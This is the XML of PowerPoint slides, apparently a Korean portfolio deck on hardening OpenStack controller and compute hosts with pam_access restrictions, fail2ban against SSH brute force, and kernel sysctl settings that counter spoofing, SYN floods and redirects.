          <p:nvSpPr>
            <p:cNvPr id="79" name="Text 64"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8127573" y="5458561"/>
              <a:ext cx="1523923" cy="2821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웹 취약점, 계정 탈취 시나리오</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="Text 65"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9819293" y="5458561"/>
              <a:ext cx="1447819" cy="2821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0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실제 상용 서비스 모의해킹</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"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55" y="-2154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>
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>PAM </a:t>
            </a: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</a:rPr>
              <a:t>기반의 호스트 접근 제어 및 관리 권환 최적화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l="-837" r="-837"/>
          <a:stretch/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381304" y="390449"/>
            <a:ext cx="11079387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Openstack Controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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,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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Compute 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시스템 보안 설정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Infrastructure Overview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400506" y="1984933"/>
            <a:ext cx="5304600" cy="1831101"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 42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22D3EE">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="1016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371246" y="1965731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371246" y="1965731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5525385" y="1965731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5696378" y="1965731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-7554896" y="592462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-7554896" y="5752719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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2400757" y="5923666"/>
            <a:ext cx="190195" cy="2112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-2229764" y="5743209"/>
            <a:ext cx="19202" cy="20921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Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371246" y="1661237"/>
            <a:ext cx="2943454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 err="1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pam_access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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400506" y="772130"/>
            <a:ext cx="14717513" cy="549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48" y="2003679"/>
            <a:ext cx="5314659" cy="1873072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371246" y="3876751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Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371246" y="3704844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12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5525385" y="3875791"/>
            <a:ext cx="190195" cy="2112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Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5696378" y="3695334"/>
            <a:ext cx="19202" cy="20921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Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400506" y="4537633"/>
            <a:ext cx="5315074" cy="1720367"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 42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22D3EE">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="1016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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371246" y="4518431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Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371246" y="4518431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Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5525385" y="4518431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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5696378" y="4518431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Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390296" y="4223537"/>
            <a:ext cx="2943454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 err="1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pam_access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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Compute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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rcRect b="19086"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="419555" y="4547006"/>
            <a:ext cx="5262557" cy="1682344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390296" y="6258001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11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390296" y="6086094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12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5544435" y="6257041"/>
            <a:ext cx="190195" cy="2112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9" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715428" y="6076584"/>
            <a:ext cx="19202" cy="20921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Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6144082" y="2005292"/>
            <a:ext cx="5429707" cy="1807446"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2051"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B">
              <a:alpha val="6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Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6144082" y="2005291"/>
            <a:ext cx="45719" cy="1800047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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3" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372682" y="2518803"/>
            <a:ext cx="5009998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 sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Image 1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372682" y="2700768"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6601282" y="2693682"/>
            <a:ext cx="4972507" cy="300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관리자 전용 접근 허용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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관리자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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pc eodur (172.16.0.17, 18)</a:t>
            </a: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에 대해서만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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roror</a:t>
            </a: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계정 접속 허용</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Image 2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372682" y="3107295"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610807" y="3070719"/>
            <a:ext cx="4771873" cy="3582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루트 보안 강화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root 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계정은 오직 로컬 터킬에서만 접속 가능하도록 제한하여</a:t>
            </a:r>
            <a:b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</a:b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원격 루트 탈취 공격 원천 봉쇄</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Image 3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372682" y="3474808"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6601282" y="3476332"/>
            <a:ext cx="4359275" cy="2285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기본 정책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리스트에 없는 모든 사용자 및 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IP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접속 차단</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6706438" y="2165844"/>
            <a:ext cx="4676242" cy="23865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pam_access Controller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Image 3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381521" y="2209724"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6144082" y="4538942"/>
            <a:ext cx="5429707" cy="1549659"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2051"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B">
              <a:alpha val="6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3" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134375" y="4537633"/>
            <a:ext cx="38405" cy="1556994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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4" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372682" y="5052453"/>
            <a:ext cx="5009998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 sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Image 1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372682" y="5234418"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6601282" y="5236857"/>
            <a:ext cx="4972507" cy="300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인프라 간 통신 허용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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컨트롤러 서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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user </a:t>
            </a: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계정 접속만 허용하여 노드 간 필수 통신 보장</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Image 2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372682" y="5640945"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610807" y="5604369"/>
            <a:ext cx="4771873" cy="3582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불필요 접근 제거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외부망이나 비인가 단말에서의 접근을 원천 차단하여 컴퓨트 노드 자원 보호</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6706438" y="4699494"/>
            <a:ext cx="4442430" cy="23865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pam_access Compute </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Image 3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381521" y="4743374"/>
            <a:ext cx="133502" cy="13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36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55" y="-2154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</a:rPr>
              <a:t>무차별 대입 공격 방어를 위한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>fail2ban </a:t>
            </a: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</a:rPr>
              <a:t>자동 차단 체계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381304" y="390449"/>
            <a:ext cx="11079387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Openstack Controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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,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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Compute 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시스템 보안 설정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7554896" y="592462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-7554896" y="5752719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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2400757" y="5923666"/>
            <a:ext cx="190195" cy="2112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-2229764" y="5743209"/>
            <a:ext cx="19202" cy="20921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>
          <a:xfrm>
            <a:off x="0" y="40005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>
          <a:xfrm>
            <a:off x="0" y="40005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>
          <a:xfrm>
            <a:off x="0" y="40005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>
          <a:xfrm>
            <a:off x="0" y="40005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>
          <a:xfrm>
            <a:off x="400506" y="849630"/>
            <a:ext cx="14717513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428" y="1965579"/>
            <a:ext cx="5778142" cy="2785554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290147" y="1686201"/>
            <a:ext cx="2943454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fail2ban</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277432" y="2005292"/>
            <a:ext cx="5429707" cy="2037359"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2051"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B">
              <a:alpha val="6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Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277432" y="2032799"/>
            <a:ext cx="38405" cy="2012189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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3" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6506032" y="2518803"/>
            <a:ext cx="5009998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54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506032" y="2700768"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6734632" y="2693682"/>
            <a:ext cx="4972507" cy="300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자동화된 능동 방어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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관리자가 상주하지 않아도 시스템이 스스로 공격자를 판별하고 차단 수행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Image 2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506032" y="3116820"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6744157" y="3099294"/>
            <a:ext cx="4771873" cy="3582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보안 정책 강화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로그인 시도 횟수 제한을 통해 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SSH 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무차별 대입 공격 무력화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Image 3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506032" y="3474808"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6734632" y="3476332"/>
            <a:ext cx="4359275" cy="2285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로그 기반 대응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모든 차단 이력은 저널에 기록되어 사후 침해 사고 분석에 활용 가능</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6839788" y="2165844"/>
            <a:ext cx="4676242" cy="23865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fail2ban</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Image 3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514871" y="2209724"/>
            <a:ext cx="133502" cy="13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47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0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</a:rPr>
              <a:t>커널 하드닝</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="1547165"/>
            <a:ext cx="6038621" cy="4934102"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 42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22D3EE">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="1016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371246" y="153710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371246" y="15371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6229731" y="1537106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6400724" y="1537106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371246" y="6467551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371246" y="6295644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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6229731" y="6467551"/>
            <a:ext cx="190195" cy="19202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6400724" y="6295644"/>
            <a:ext cx="19202" cy="190195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="22D3EE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rcRect l="1010" r="9650"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1565833"/>
            <a:ext cx="5928456" cy="4900017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="390449"/>
            <a:ext cx="9134856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Openstack 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시스템 보안 설정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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: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 네트워크 침해 방어 강화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572707" y="1567142"/>
            <a:ext cx="5429707" cy="4919611"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2051"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B">
              <a:alpha val="6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3" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572707" y="1594649"/>
            <a:ext cx="45719" cy="4892104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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4" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6801307" y="2080653"/>
            <a:ext cx="5009998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5" name="Image 1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01307" y="2300718"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7029907" y="2303157"/>
            <a:ext cx="4972507" cy="300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IP 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스푸핑 방지 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(rp_filter =1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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 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패킷이 들어온 경로가 나가는 경로와 맞지 않으면 즉시 패키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,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주소를 속여서 들어오는         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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 공격 방어</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Image 2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91782" y="2869170"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7029907" y="2861169"/>
            <a:ext cx="4771873" cy="3582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SYN Flood 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공격 방어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(tcp_syncookies =1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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과도한 접속 요청으로 서버를 마비시는 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TCP SYN Flood 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공격 시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,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b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</a:b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 유효한 연결인지 검증하여 시스템 다운을 방지</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7135063" y="1727694"/>
            <a:ext cx="4676242" cy="23865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커널 파라미터 튜닝을 통한 네트워크 침해 방어 강화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Image 3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10146" y="1771574"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Image 2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91782" y="3459720"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020382" y="3470769"/>
            <a:ext cx="4771873" cy="3582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리다이렉트 공격 차단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(accept_redirects =0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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공격자가 임의로 네트워크 경로를 조작하여 데이터를 가로채려는 시도 사전 차단</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Image 2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82257" y="3907395"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7039432" y="3918444"/>
            <a:ext cx="4771873" cy="3582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브로드캐스트 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ICMP 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무시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(icmp_echo_igrnore_broadcasts =1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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네트워크 전체에 응답 패킷을 유도해 과부화를 일으키는 스머프 공격 방어</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Image 2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82257" y="4412220"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020382" y="4423269"/>
            <a:ext cx="4771873" cy="3582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소스 라우팅 거부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(accept_source_route =0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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 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공격자가 설계한 특정 경로로 패킷이 강제 이동하게 만들어 네트워크 보안장비</a:t>
            </a:r>
            <a:b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</a:b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 우회하려는 시도 차단</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Image 2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72732" y="5031345"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010857" y="5042394"/>
            <a:ext cx="4771873" cy="3582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통계 및 핑거 프린팅 방지</a:t>
            </a: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(tco_timestamps =0)</a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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 </a:t>
            </a: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외부에서 서버의 가동 시간을 추측하거나 시스템 정보를 식별하는 핑거프린팅</a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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 행위를 차단하여 시스템 정보를 보호</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
